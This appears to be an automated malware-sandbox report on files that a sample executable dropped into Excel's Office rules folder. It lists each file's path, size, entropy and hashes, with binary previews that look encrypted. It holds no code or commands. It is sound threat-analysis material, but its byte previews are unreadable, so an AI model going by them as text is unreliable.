                                                                                                                                      Preview:<?xml....j2..d...M."Hh.5.x.A....lh..5....IAP...%...[1.-1...\.3n6....u..{.'2b.....x.....q...{.....L.0Br&.....e........;.d..].U^....(.g.J....0j..rR....5.7.*%n#P......Rs.(...M..R.a".[!...Uk...%..0m....1w..)Xm.......w...1...vG..H..w@./.we..W....b5K.....1......I.,..k.7T{+R..+..f.w.V.*$..)>...0.....![....nz|...?.H.@..D.k..".f..@'..h1.R...a.rTV....`..GL7Qq..N..?.?.....-6.....tu.')QE?.....B_/.../r .q..n....c...h......a.....Q...(.x.....R..{4.IK..;]...B.d.K.@...C<......w.}^.R%i.A.b6.Z.8m}..M.h.l...~&.D.(..$A1..[.!Y.n.....".\..~..RY...L}q..8.....1...t..R`......c.Q...r....1.h..dI;I....we...^.w40..x$N6..:../W..o.=.W.uUj.B.I.1/N...l..5pxbSW3..i<0[..\.bqj#w..:Fc...Y.._-.nm.....11.........=..^.....&x.L.Do....}.!.8=...O.S.........K.Ly.:....&..eEZ..F....) .X..I..!...G.....A..$...?...9....N08)M..>.,....(`&,I...n..w.....C........3\T....(...tu.}..:..m...N..o5},n}{..SUZ...h.(....ti..~...NF..7q/._..6d....._........*v..S.q.N.n.z.m9.M.D.j.../..#.."..Q..'..

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324002v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1197
                                                                                                                                      Entropy (8bit):7.829815542807831
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:gned5ahKrveAYOAoasTyWGElKBlCEslO+buupH/r6IcW3ViOrHwrQ5jRbD:gnetvPYEyWGElKzslO4Vpfr6Ic9oiOD
                                                                                                                                      MD5:A05853DA9BADFAC55A8BE65D074511A4
                                                                                                                                      SHA1:122F1AFB107E3A4B0D42D79B82D0F588CAFB40D2
                                                                                                                                      SHA-256:C332DB72C8558F6A5719DA23C832708FA396279078FD52806C59BBB4AE28F331
                                                                                                                                      SHA-512:589E685239CB31DC6ABC8C085DE7BE7F8E37144BA8AEB1B5FF5C02C64D431AB70C990403555949686102C758AECEED5E28FA1101750183BF3472A07AC3FB690E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml~.#..EL~.....L\...a....X1.......Li..1'1..e.X..........QKp....x......9..`D+.s.H...f.d.#..o.K.|0.O.}.N`..Q........z..{.4.$Vzr[y.....8K....$O.W...c....s(.....~....N$.pe;(..D....GDux.MSM.2....e.:.........I...........xi.n*x.....|.4..[J...@..%v..e...D.qP.PQv..`;.m...x.X...W..J_..q..|Z....2e.K..Bg.#....!.cUl.(..1.a=.*...Y`....X.0%j#.s..9...'.n"r.........u..n-.B.^$.,.X.mYz..G.P...Z....c.......!d.......jqS.~k$.9.......x...HU7f.T..L..&0.(~.7..rE.....`...T..n9.S...H#..)LZ..0.(vE.......o...].v1....j....1......Zz........Rl.....@.5....E.9....OP..l57.{Z;..@If_.l.......m.*1.bC$....mE...?.-.........X.X.j..V.`G8..J.n...}.:..G`.y......z.V. ..K8\...AO0..2`...m..e.......<.*X.#.i....`B.{b..a.e.......T.B,.>...FS.c-...".g..gt..2....Nn.o......Z..e...F.]W)l.M..?B.|...{.'u...%1y..!@~2Z...........#..t...J.........f.a`..A...($G.=..h. .?...._.........g......'.W...Z......T..m$.....{..=.>.?v...2.z.C..).%....Y>.q.2%...Avq...L...n........w]....G.p......2.......

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324002v2.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1197
                                                                                                                                      Entropy (8bit):7.847850991084907
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:YPWZd64jqS0ClSe1ZjwyRJ4zSr2PfdmWZCqzsYTPkr08OQZa1TxPbD:YeZ/jNnBNBb4zIKAWnzNTkr7OQZGlD
                                                                                                                                      MD5:AB21C785E0A17603935A2AFCB03DAFF1
                                                                                                                                      SHA1:A4C274FDEDE37C78B5307DA62B6CF6025415686C
                                                                                                                                      SHA-256:8440CCB3470EDBD1EC7628213ADF5D42C3BE666F9DEEA6AB49555AA54988FE72
                                                                                                                                      SHA-512:7D7B11C5C17D154B012C01BFFD57AEF7274559D4B8B446CF2DEFF241982611E5C68995A170499CE7B1E4C77396718913AEBA1BA4634DA75E2465D82CFB664F54
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlc........8.?f\.....i.K0...R.g.4..D%...0_....7(.g...g..x..$.c`.../....U.q.U..4. ...u2...##w.B..d....F.f.b.R..."J..,....VE.B!.S.FC.X..Lf...;:.......[...+...Ld2..E....V..-..9...P...V&.....3w...a...aD.(R....`c..O$'g..8..>7..s....jnc...oD.w.z8t.UY..Q.m...f.4.?.\..s~........!*....X....w..n."....+..1;3T&...nP....A..qHG.*.........'.y...A;7.uUv...`.O...d.....+[h.... ..%....5X.*o1....::W`....C.D..n...,.,.......&G5..N:K3J..~.~P.V..&S.)m..g....K...{...0..YY...aT.Zd..UZ.M.. 7..............?w..wS.Q..+.R.",.Kh....t..@..Cy....a.uHX..,.-.j...c%'.t9...X..3h..b..T.C.&k.@..D...!...uM...g._U...T......\...(6....!h......#.[..;..b..*#P..O.qX...0A....M.J...O..$`=>.......N.M. .]..Uz:..x..V..:jeC.b.^..E&...N.n.z*;.......>\.H...".R....x.......&.....8@.q.....@.....r..L.t.3...05.:..2\..s..r^\0..B.r..O....|\.k."....R?.....*..a)..wu....1...s....j.S..U!...Mn..}..w2.)Re.8ou....m^..{t7N".?...........v..S...7(.u%.........y..\.^..J...s..a...J=.t.m.,.8.td...

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324003v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1079
                                                                                                                                      Entropy (8bit):7.828597638641955
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:7aQfZX7JBwBTmmXL6ccSRtkkH4fM1nJiBAZHaqYuMRJbD:bZXFBebXL6cMkz0BAZ6mM/D
                                                                                                                                      MD5:B0196B5369F643DC78F74C374838D283
                                                                                                                                      SHA1:EBE75283D9DC4A6A924DB3CA19E3A131713A1EE5
                                                                                                                                      SHA-256:83B1C420B40C4B8EBE069476FAB649AC3D68650DC5ADD885380EAA0989759881
                                                                                                                                      SHA-512:29BC8414ED443EF38CD9FF2F23820B72F9590D640DADF06C594C5E225DE7557BA4F141A8268FFDFC35CC41F122E7F2EDF3FAEFAF56F9258B1A12A7A2291EE82C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..;[.F2.<...k...........k].<C>.....:.)... ...D..I......O<.@...w.;e0...P}.l.pq.F......&....V+.W.>l.$.......R..k..E0.qJ..R.e.e...|...hR..r2u...........nBA.....dn....3T......\%./......(...w."v.US.I..L'...c...`.D.L.Di..".%n|T.)n=......3b.Oi.......I........p..T. ..m..q......Z.h.wU....%..c..........2%..,Z..K..7Sdr....|s.O.x.f...E.&..{.7..F..Y.....V....Ri|K.....0....7*...2R%.....!...z.......h.8..5...}\......".P3.Jt.......H....H.......e....>........l.^.=.f.).upB....n.....h......:qC..T...w...M.1I3+,..0_@a.Y0I*.Vd...`Q].b..i.+.I......a.s#....I....!"#...xH.|..8...c....::yV....$G(..W..#.r.l..i....~.[6.W...S..LK:....v..pM.2..o..#%...'...MK.-..{.K.....m...@.B......*.{..g..hh......6M....v...93..O4.FXK....s.U..F..2...,p..ax.......D...qS.#.......Il..H....Q.......@..&.........<G...=..D.y8...{..:&.s.).....M....B...au.x.....$......=.o..N._.`..f....%.G....6..$^..JTc.....09^u..!x.k...{.D'..L....$...(.?.4w.,Z..w.T..7qRD......oh..O..S).3..E.D1..yO'`O

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324003v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1079
                                                                                                                                      Entropy (8bit):7.794924292117166
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:sJRhvngxpC8Ka2dfkFgqsWWL1etdbVSnVpbD:sJRhvg/Cna2dsFlsWWL1etdCD
                                                                                                                                      MD5:D400754558E9ECD9D96CE7A68C7B4764
                                                                                                                                      SHA1:35A95CD950EE909CEAF158DDF69FEF9C81D51FB2
                                                                                                                                      SHA-256:3F4BEE2E58F0BBA9D45E046AD13334789A3FC78EF4BF5C9E44B1B46F99D4CD90
                                                                                                                                      SHA-512:41D178D87C83AB8FFAE133B5AE5DE60FC6E49E976379F929411D40AB966796838F099A6D76D20A202B909D51C9A87AA365A415CA6420030CFF711B38F118A469
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.....+...R.....R[......P....B....>....Fa5.SH.W.(i.G.P............y.]Y7.F.Rj...v.f...._...r..N...fp6.-...K..y'......./V...d|......qS..9.o.;8..^..H.14s.B.?<3.NT...t....._%..}...`;....I_F."..0...lfr...|...a....c..d.U.:<....&.7...?..+..xP\/&).d...v7..d...?To......#..6CSn..xo.......x.pP7..{N...e..C.6...x...R....I..7..X#.\.. ...iv.V4.5%....e.....Z&d.|Y.o5>d.%Rn..(V...+..q...s..|...Ud..1...Z..r....t.$.a.`.}^...i...^....e.uwT..'7..{ e/B....F,w.........a<.Z^..to.$Z.|.IS.4.p.o5......[.....M..+.........D.f.2b.......6...1....O..X...+o.,I.h._.j0.......{+d,.^x..(nC.<.........].~...G.a..O?.u?....'..(. A..u....v[..o1...)y.|Fte\...,.....l.A...:.?..8.............\...I..o.Yl.=J=.T.u...-..J;,...=I.P2tu.A.RP...a..|...+.K.X.l....3.z*.h.0..y)....!.\\vW 3. ...D.b.7S...Q.;,...0h.^.[...+....Z....,Y...+..47.Gb+.M.......6.6........G.>xn...q...ng.5.>{....(.d........~......mh.D..Uc.LI.)b}...h...-u.........4.d....N6..b[....k.G&JZ.....X.H....B^.D.O.....n..T.....83...X..c

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324003v2.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1079
                                                                                                                                      Entropy (8bit):7.802707109083921
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:1jyXnS9t61SdeoeQWmkthts+oGV4kxp03wbD:1US9wgeQWmkthOdCtW6D
                                                                                                                                      MD5:1BB758FA80634BD21B1A4A5ACFE10EE9
                                                                                                                                      SHA1:397DBEF8EF278B61D44EDB60337A6859BC431D10
                                                                                                                                      SHA-256:F5B88035B529E3EA8ED2442D4CA187BA0CD108FEB3E47D612EE79391B7D232B7
                                                                                                                                      SHA-512:E8DC5E20389F9268A4B0EAB698D4DC1D2F8A1790870DB3C503CD66A84C9D3AC373A6AFEEDF8446BAECA2F6B9AA3BAF46BC115C83CD3BB8A298A1ED6AEF1AF483
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.......0.,..k?.....c.m.L.X2.0E....t...R..P..L.wa.. ..v..S....L.I^.NK..R.i|...C.V....g.#.t.u.5c.x.,.2vO>..=.....U /.l..\...,c..}......jN0.l...Rc..Cf.B.....>@S03.-......~..z.F....PN~...oz&oTRW....) sl.e2....f....z._..Ds9'H2....Ew..."7....bO....|......e...l83....1d.......@.....K.1.....*EU.7..P...W...R...Z.;{......)!.{....2..4.M..|zj..X...g...2j..~.(Jg...N..?.Q......}O.D.....4...0.....2.@U$s.5Fn.".........S(`k..mo.....T.n.b....2g"X....c..=...u(e...%....t....:..:./o5.\.e*.>B(:b.V.u..wnj.u......>...6.i.fw.\.!._...R.......z.ew0.K.T?Q...vGw..........!<.........)..n... 3...?..V...%..l...t5...~_.V.M.\.t...W.~.{jo.Ui.+m......Q...y.5.a......F,s0..t..../...".P0...R..*.Q.N`....pL.RX.Q.....d....-#.....3.9...jQ..]$N.QF.`!*..@...o..D73..c..4....y.....S.<............ ......Nh.Hd.z..`s.;.w.Sd.'.Z.D........k..f'L.eG.......*j....T.)...O.FM.Y.]....]R......a.......x.-.0/N.g.q.....E2..W...z..z.......p.;z4.).!.L,......s.1}sm...0..P...(.AZx...y...P

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324004v3.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1073
                                                                                                                                      Entropy (8bit):7.8017381415174425
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:SgeTecNEth0d5CQt0n5klr/6V7qFds6i9mDXIlOABW+pmmNIT33FtVAbD:ShTeIE/0fP+n5kYP+InW+pTI73gD
                                                                                                                                      MD5:06E58A154E2C3CC1FF9CC50453D12C58
                                                                                                                                      SHA1:2F48EA49A85EC9DBA3F3D6BEEB6F4BC1E734664E
                                                                                                                                      SHA-256:15A07A343D8F95550F30E7DC745A5CBF2772EC7866415C49E87103FD357C6F03
                                                                                                                                      SHA-512:D44BC15F81B9E5546BB5095FCF56ECBE797BC29EFB51B6CEBFA7898A9165A3E8BDCD44109638D27B0AB173CCC712B2AABE1F93F27CDEEFAED5D48342B661F5E7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml)7T3..+...0v. ..?k.U0a...L...D.2..x.8Df.B....`O..7=.......F....7..$.....M.|8.7..Nf%l.j./}.. aCk{../........._.Bo......g.N.h{_.y+...W|....V....m.......M...L.....,....y)......y....K-.....3.+..F?.;V=.;;.0|......\...=p...D.6...(.......Hf.r7..6.m"...!.G.y...l.....Y..s.h:.\]v..?|.y....h.n...q...~I..7.E.i81.a.S.. .qg.e.du.zQN2"O`...;.....j,j?.%...+....jC..^}..7{....h....qV........!sH&.)......'..../..=[.p..G....C....{.......8.j.......<../..........FZ4.......`.]x...w..*L.$c,*"q.......-yM...z..z......@.....p. ...g.....x.h....PS/.3 ..Q..u.V..X..s.^B...W).d+M......_.;...(....cv....U?.\.C.x.\...@S.*r.bs33\m...............x. ....f...0&+.b..@.l.o.*n......".3...7.cre.Jm..qb1.....s.(.g..H+.S.......O..pI*....l.AtWR..dz..0...NH,FQ....%[.5.}....SMp.....9..Z.}.....,..G.@...*...y...".RE.?f.y...rf."....]..#m/Yu...j.p...i..Q....1Z/){8..D....0..Z..p,.)f....n.OS.7..........y..=y,..C..e....[.......2B..eB.#AQ...._......:.~hb.`Z.I...;~....Z.c...tp8qj

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324005v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):933
                                                                                                                                      Entropy (8bit):7.789408447694346
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:IxMfcM9w1Am/t+3aawsnOXj+ft3UErcVG5rsSeEvYwKG6jRfCPI7AzHFQ8pd2ajw:/6v/tWwsOXbeourCR3MHq8hCbD
                                                                                                                                      MD5:5567476E0240E0706DC4965AEDE4A149
                                                                                                                                      SHA1:3533463B81EDE43664A8285FC8647CFBE0A88A2D
                                                                                                                                      SHA-256:281C3576E5914DA92DB7D52108B8FDF7FA24C26D333C0E2DA59B350020B04682
                                                                                                                                      SHA-512:92D74BFC2522A80CF6C04E3689F2CA842B51B9A180DB440E11AFDBF1B3345F968C82EB835F1607823394F57306D5057DB22526E0E23183285D64BA4BA8523CD6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.!o...:b+..ZT-..rA...|.`.0......F...O.L.,E7k..T.... _..N]x..N.........=u....Sl.......z.C.[.4..R.+....~...@Q...r.U..PB...I........2....o..'..1O.....Ph.\.....tCP.,..1DM....3. .....*`H...i............3Kg(8..fF...|I0..^B..vE...)...`.d.y.....u`.....#.d.[.KKk.2.jY.l...J.W.[r{l....\...L.P.K..@e....+:...yN..FdJuT.d.G...B....W.......'.. ....N....K.....(..Cu../..0....JO..vAZ..O....#r..VX...J..D....r..t.q....`.{!.7....r.pl........;K7.f...V.!..?.).o..q.C(P..~U..w.&D.\.r.....kq..>..3.f.6.hU....g.n...P;.q...Ox..%.....6..:..em.| ..L.>E.e%......!...yP.2..<.L.0.u..@..A..o.z.G.~,..+..$.(m.:o..&.W..}vy+...GAo/.=...R<.x.^M.8.X...q}....^[p.COb.........t..2.|K.3.....<......i.p..C.?.xy.....}<j...s..U....`...4G..W.%sPH..x......W[Y"V...3......7.....W".wk.....!f.w@*.`..........E.Jr.....@.......cn..Jx...tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324006v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):933
                                                                                                                                      Entropy (8bit):7.766834783268362
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:qxCtUOyzj1mqDHMMbxOTOFMmr5dFoLP8kfSAVXPM1Nko8kVTx5LlcMukIcii9a:WI7o15DHLxCQ5rUafLp8KTvlYbD
                                                                                                                                      MD5:F2DFD87EBE6B672B24B10422F118E255
                                                                                                                                      SHA1:736467EEDCED7367C32C92A735320DDEE21EB4C1
                                                                                                                                      SHA-256:7FA860E5C6BC6D0DD0F4B5C6A4050A441670EA65BE900CA0982E11BE7BAE121E
                                                                                                                                      SHA-512:CF1141E9ADDC526E45C394FB6B953B6E5ECCE6C7D12171E6670A20D0DBA3E5120CF93F9C9F6EC3ADF7154BCCB2A3839772D31F84AEE235C2F75631750D7D0B16
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlo...A.......f...M..%.Lt.....@....B.h]...I...K...ffw..Y.`..T.L<*...R.&....O..H ...$L.Wu.9.}...+?b$g~....p^.........3.*...}..U.r......;D.4.Yv.."....2.U....l...m.m..........>..W8..(Z.M....]]..3..U...tj..:...^F..k...]....[...e.m..J....:.[...6...&..qC.k.F)X#.1..V.1.$.).....L..Q../.....f.U....b.+.`.....+.).v..-Z.8....7H.....V..M.1T..}...........}tT..i@...$..[....K^.....}./...[v...rz...m../.w.wJ....BV..1...|....LB.........uO...O.&3.W\..i#Z..z......DW.^T.....9..{cN-A.kl.{.....B...t..w+.~.g....^.^...h.bhF..h....=.N......E.(dk/k.|..[..8.....?A........7.[F.B:.....e.l*....9M.c.k.e..2l.c..h..F*..^..........l=.... =.+i...-...[..../... ....#_.t..H"...t(....O3.K..(.IN.l.(...3?.?3.<......Z...u{...K...N1.w.....wC.S5..}..1.+..f...}....Sf<..J)~...t.v....7Z...{wX..P..{.x>*.zt...ZZ..}b...7..?......e..=.(m.*.P...:..Gtp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324007v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):945
                                                                                                                                      Entropy (8bit):7.783580742220535
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:S4SDgzvh1pgW2CJpehU7ebTTX67e0rcDb8jR4bD:VcSv3pnwlmcHaRiD
                                                                                                                                      MD5:8F7A44749BA3C29BB42777CF24139FED
                                                                                                                                      SHA1:9AE3FF025226299EDA53E6E5F5DF35AF07AB9A19
                                                                                                                                      SHA-256:8D303F8C6959667A7A139961F996B1370DFB66CA28D1B918350CEE233BB6B2BE
                                                                                                                                      SHA-512:1332F31FCB5F69C633AB27BB62FBA63F5EB91CBDC908D8AE615C0D83E2E4446AA7C96A5E7A90DAD060A6E1AF20A0DA9318508543FF31602D1FBC1513A68F8617
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.X6`...7..\..5....0e...48!Y...%..;m.z.7G/.y...g.].."....l.Y.]J.._I./C.Sa....6...6G....L.T...pb^"....Q...-.B7.&|..M...........3p.qj`......B.:.<M...+.|.>.=.......g...7..M.%3.).2p.E....W..........D./..r..7CH.=...hy....I.....`n...$..~.....tK.K..Q.,..HM..@..N.......+[..T.y....?.x.H..|...e...1b...~..uJ.1.S..F..t#..(...V..5._...fi0'..V.m.?.^.N..\.?8..<.....{N......w.2e...T[..:.g.\...V.*...%..'..._{........z.cR........|. .J....v_.jb1-...........%B.[..{.....IPf.T..>.<w.....ox..........D<...=X....I..7].4.w.+A.-p.Aoa.FS.Gy.V.+.'..l..).N.....^.W.......^k.....I.x.....T.D.t.....TkC.F.^...L..$.....)...[......g?...I...q....b....4/..........TiZyo3>..J..D.I.y.M|.....5.y..._..3z..F|/B.i......k.".......s*[.1m...Z...4N,.\#....-(.o.]..3..7.nBW.(/.j....s.n)...J.5.....3l.$.f.....sC.,..-../A..'@V5b.5#;.I.v.:.....4..OItp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324008v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):941
                                                                                                                                      Entropy (8bit):7.770337825297202
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:jgf9SkjGxO8XI+sB46TTCLesjYpewtYj87XGv7FV7bD:cfgkjqje4vSvtnLQD
                                                                                                                                      MD5:D10C994472F1E0AE76C3C6E18459C352
                                                                                                                                      SHA1:4016491250F75E8FC24DA2A8F5F4D38D6E6E3349
                                                                                                                                      SHA-256:6EEDB000B435BBE9820BF449525CB0F2F5BC58323AE6AA91360225CA207226FE
                                                                                                                                      SHA-512:C042E8E7622735C7B064EC830EFCA245A17E03067525E99E8261F8B12B9F61A20DBEF06BBF67D62565FF3C982D3412B477ABE2F2ED57C60C60B7C15D4726458D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..._zTW..sH..h.Z.k!s."....~x..q.Z@c...KlO.Y....3Sq....:f..*.+.q.E...%.>.?Rw.&.o.X..)A_.?(`h....v..`P..".F......k.*!V..|..P.T.L.-../....t...gN$...K5......Kk.#..cK.F.'.;).c{.na.p<.-*..N....hI..F.dH.{'\}L.N!.y..../POs.qR.?A.\c..t..%.>-0.j........g..b?......|.,.H.!..X.....!.......O..A.!...h.5c.f...._.J?..q..5h....9.%K+...uL...}....2.N..&.....KQ5.=..BFt%S..;.h.......{..y...\Sb...p^n.7#x&......0#0...m9H.O.q(\.s=5eYY.d...;6..o&...IOX...%...jo..h.....(.....b=#*.m_..I.o(Q f..[..]-.q/.........1.....}..2n...4.I..'j.....d.S..O(G...U...g.>....0...=7....T.Xz&#...+..^..._........[.$...[..H.V.d.....8......l..g.j_U..(}..C...>...X.".*.....p..l.Wp.c31....a%..e,k~:...N...&.........C=j-.j..WR)....^.....$gCfZ....q.h...-...Eh..C@R->....I.....Q.N.g".....Xz-.v.....u..-....i...$..B.......K..FL.9..~.a....N...=...n.p.)..0....X\..@].3*..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324009v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):945
                                                                                                                                      Entropy (8bit):7.765159877399939
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:0BNIUQXmse7JFsyg8+2X+UFhaPoXgfDoAsC/LUybD:0BNI3ms2JjrXfXeUA9/7D
                                                                                                                                      MD5:349D3D81488A09228003A71C6E5A1B4E
                                                                                                                                      SHA1:19615BDB4922D2726A7E96609E8C846350E75BE9
                                                                                                                                      SHA-256:D10F11C06C82B976C54B6E93811B838FCBBF82B192C1F39CA5E2024771A3F505
                                                                                                                                      SHA-512:EE66B9B87D64C54CE7AEC23FFBBC6B2618BE44DBC0E7BEAE6FAD26912C5495A2EC926D9590E4A4A2C36769735205E5DA3B6E7D5791E6CD4618F0056E8C37DA97
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlwI~.=Y.?.:.r&..p.tB...gJ...nyq&.o..$.^~|.@.,.....q.~AK.a...pU*N...K....D..eD5...........+$'.y.E.q............W.'F..2...q~...o0........6...n.r../.....b...+..@.......rv1.5.y..y.......[dx....z......p..?.Q.*.S..\L='..[....o..[l..Y....n......k.........61.Y....tw.}D'>......=i.b..g..O.....D.."..N.....[o....\.?.El.8..x....q.a.....D..B+@...@+.iL..O..!.4W...~.7_..eH. /.}u..Y._.3..u.Y...u...I.Gp..[y.L...k...4...~...2j...O.....~...F..i.t....b..v..xQ..~h./...O0[..9..y.N...X.!...5./.......G........p...An.?......a...2m.(....9.;.......|.]...[...$..._.0dB.f...c....JG..k-Gs......u....fHe..t.w.x.S..t%.c..8*...F<..4.~.2l.UA...b...(.Zj...2{.}..L.@....#..h.)x}.......&..>. .;...n......%.6t.4Oqn].B...7.?..}4..h...Dl...'......<..$......4...u..?..0.P....b.R.8..gZ..9...?.W..P".g....hPHV.|.=.A....\.....Jx.&.KGe.PF..B>6.Yj.w.@.'C+..b.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324010v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):945
                                                                                                                                      Entropy (8bit):7.765205661665309
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:sBAukraxCDeBl/ZNLaXR7JiYp/tXa2QzFbD:sqeoINuKE/WVD
                                                                                                                                      MD5:5CB823E33059FD2BABE45973B674F426
                                                                                                                                      SHA1:770DABE60F2C68173B6E6E6DC9A5CF3B7ED32558
                                                                                                                                      SHA-256:732F1BC01AF04421D70120E7B72567464439446EC3A232DC8E88794DCB92F1D1
                                                                                                                                      SHA-512:B7436F3777A2DAF7161AECC29B5D0CA038C0DEF06C9DB11029481ED8EE41DA9F614CFE45A80F5BB5FA6C6C5ACD585C869BDD52E479482DD20258428FCF764307
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.AY[..L...)..6.}.N..`1.....DV.W......v..a...{z...4...J.#.>..>..cd.@0.lRQ"Nq...h..Z........jG..]..)L...5.a.w.cv...r.x..g.".....].X.PF..g*....'R.P.....L[..:....d.o.p.+$.. ...y..mU.L.1H.]........G..2....~e..s}kR&..GL..=?B.....]Na.<s.Z..Z..1{._.......|f,<...[.QO..m...i./{..O.f...&..........6O...K.90O..Dp.D.a../-rS...f...ET7......E=d.M...C%.i....FdAmp.'.U.c|.(.....<...T.;.....l.S.j..{.E.. ..pj.../aW......\3....P.!w....~.5...hszO...........>...Zb...Q.....@...}.......8f.........\..#Z.zs.+.z>...N.M...Q].|.I.M........?....qQ2.....ve9d6g...J.o...p.h..y..TQ.J.LI..,K.oxDXCe..R~0l.["..Tg./N.s...SY.=4...qtI..O..RjLY..n.PM.).%._.*.......)....B].S..qi$......bb.\........[...\...]..).x..(-6`.O....KY..}.d....T.\p.R?`.0..o..:..7.j%...../FcR.W.a...."{x..Mr..[.=.u.6a.;.L.:....w%.....0........P.Y#<...k..kCU.x......W..k.....^..<.*...%...O.^tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324011v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1000
                                                                                                                                      Entropy (8bit):7.80556898169085
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:5eB3io5F5ouWHwVDF5VV4EAwQY7Ndvbvy3CdqN8ywkbD:5eBbOwVJ5/4KQYXjkIy8ywuD
                                                                                                                                      MD5:F3CBBF90F620035E82D940F502209851
                                                                                                                                      SHA1:91137245F5275603EC04BC727CD78012066DA46B
